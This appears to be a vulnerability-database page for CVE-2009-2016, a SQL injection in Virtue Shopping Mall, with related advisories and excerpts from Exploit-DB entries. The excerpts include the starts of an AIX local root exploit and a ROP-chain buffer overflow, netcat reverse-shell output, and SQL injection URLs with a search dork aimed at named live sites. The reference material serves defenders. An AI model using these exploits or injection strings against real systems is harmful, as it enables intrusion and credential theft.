CVE-2009-2016
published 2009-06-09CVE-2009-2016: SQL injection vulnerability in products.php in Virtue Shopping Mall allows remote attackers to execute arbitrary SQL commands via the cid parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in products.php in Virtue Shopping Mall allows remote attackers to execute arbitrary SQL commands via the cid parameter.
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w55m-5pmp-58mh: SQL injection vulnerability in products
ghsa_unreviewed·2022-05-02
CVE-2009-2016 [HIGH] CWE-89 GHSA-w55m-5pmp-58mh: SQL injection vulnerability in products
SQL injection vulnerability in products.php in Virtue Shopping Mall allows remote attackers to execute arbitrary SQL commands via the cid parameter.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
kernel: Buffer overflow in firewire driver via crafted incoming packets
vendor_redhat·2016-11-06·CVSS 6.8
CVE-2016-8633 [MEDIUM] CWE-787 kernel: Buffer overflow in firewire driver via crafted incoming packets
kernel: Buffer overflow in firewire driver via crafted incoming packets
drivers/firewire/net.c in the Linux kernel before 4.8.7, in certain unusual hardware configurations, allows remote attackers to execute arbitrary code via crafted fragmented packets.
A buffer overflow vulnerability due to a lack of input filtering of incoming fragmented datagrams was found in the IP-over-1394 driver [firewire-net] in a fragment handling code in the Linux kernel. The vulnerability exists since firewire supported IPv4, i.e. since version 2.6.31 (year 2009) till version v4.9-rc4. A maliciously formed fragment with a respectively large datagram offset would cause a memcpy() past the datagram buffer, which would cause a system panic or possible arbitrary code execution.
The flaw requires [firewire-net] mo
Red Hat
httpd: Billion laughs attack regression
vendor_redhat·2016-08-04·CVSS 7.5
CVE-2016-6312 [HIGH] httpd: Billion laughs attack regression
httpd: Billion laughs attack regression
The mod_dontdothat component of the mod_dav_svn Apache module in Subversion as packaged in Red Hat Enterprise Linux 5.11 does not properly detect recursion during entity expansion, which allows remote authenticated users with access to the webdav repository to cause a denial of service (memory consumption and httpd crash). NOTE: Exists as a regression to CVE-2009-1955.
A denial of service vulnerability was found in subversion. The mod_dontdothat component of the mod_dav_svn Apache module did not properly protect against exponential XML entity expansion attacks. An attacker with credentials to the webdav repository could send a crafted message that would result in resource exhaustion and denial of service to httpd.
Statement: Red Hat Product Securi
Red Hat
squid: Cache poisoning issue in HTTP Request handling
vendor_redhat·2016-05-06·CVSS 5.4
CVE-2016-4553 [MEDIUM] CWE-20 squid: Cache poisoning issue in HTTP Request handling
squid: Cache poisoning issue in HTTP Request handling
client_side.cc in Squid before 3.5.18 and 4.x before 4.0.10 does not properly ignore the Host header when absolute-URI is provided, which allows remote attackers to conduct cache-poisoning attacks via an HTTP request.
An input validation flaw was found in the way Squid handled intercepted HTTP Request messages. An attacker could use this flaw to bypass the protection against issues related to CVE-2009-0801, and perform cache poisoning attacks on Squid.
Package: squid (Red Hat Enterprise Linux 5) - Not affected
Package: squid (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation
exploitdb·2016-11-04·CVSS 6.9
CVE-2016-6079 [MEDIUM] IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation
---
#!/usr/bin/sh
#
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
# local users to create or overwrite arbitrary files via a symlink attack on
# the log file associated with the MALLOCDEBUG environment variable.
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1
Exploit-DB
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
exploitdb·2016-06-13·CVSS 9.3
CVE-2009-1330 [CRITICAL] Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
---
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # R
Exploit-DB
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
exploitdb·2016-01-11
CVE-2015-7768 Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
---
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A
Exploit-DB
Joomla! Component Akobook 2.3 - 'gbid' SQL Injection
exploitdb·2009-06-09
CVE-2009-2638 Joomla! Component Akobook 2.3 - 'gbid' SQL Injection
Joomla! Component Akobook 2.3 - 'gbid' SQL Injection
---
Joomla Component com_akobook Vulnerability
###################################################
[+] Author : Ab1i
[+] Email : [email protected]
[+] Dork : inurl:index.php?option=com_akobook
###################################################
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )
Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birl
Exploit-DB
Virtue Shopping Mall - 'cid' SQL Injection
exploitdb·2009-06-08
CVE-2009-2016 Virtue Shopping Mall - 'cid' SQL Injection
Virtue Shopping Mall - 'cid' SQL Injection
---
CMS : Virtue Shopping Mall
WEB : http://www.virtuenetz.com/mall/
Archivo : products.php
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]
Exploit :
undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/
ID :1
Usuario : admin
Password : admin
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
100% CHILE
WWW.UNDERSECURITY.NET
# milw0rm.com [2009-06-08]
Bugzilla
CVE-2016-6312 apr-util, httpd: Billion laughs attack regression
bugzilla·2016-08-04·CVSS 7.5
CVE-2016-6312 [HIGH] CVE-2016-6312 apr-util, httpd: Billion laughs attack regression
CVE-2016-6312 apr-util, httpd: Billion laughs attack regression
A regression was found on RHEL-5.11 making apr-util and httpd vulnerable to billion laughs attack, also known as CVE-2009-1955, again.
Discussion:
Statement:
Red Hat Product Security has rated this issue as having Moderate security
impact. This issue is not currently planned to be addressed in future
updates. For additional information, refer to the Issue Severity
Classification: https://access.redhat.com/security/updates/classification/.
Bugzilla
CVE-2016-4553 squid: Cache poisoning issue in HTTP Request handling
bugzilla·2016-05-09·CVSS 5.4
CVE-2016-4553 [MEDIUM] CVE-2016-4553 squid: Cache poisoning issue in HTTP Request handling
CVE-2016-4553 squid: Cache poisoning issue in HTTP Request handling
Due to incorrect data validation of intercepted HTTP Request messages Squid is vulnerable to clients bypassing the protection against CVE-2009-0801 related issues. This leads to cache poisoning.
External references:
http://www.squid-cache.org/Advisories/SQUID-2016_7.txt
Upstream fix:
http://www.squid-cache.org/Versions/v3/3.5/changesets/squid-3.5-14039.patch
Discussion:
Created squid tracking bugs for this issue:
Affects: fedora-all [bug 1334251]
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2016:1139 https://access.redhat.com/errata/RHSA-2016:1139
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 6
Via RHSA-2016:1140 htt
2009-06-09
Published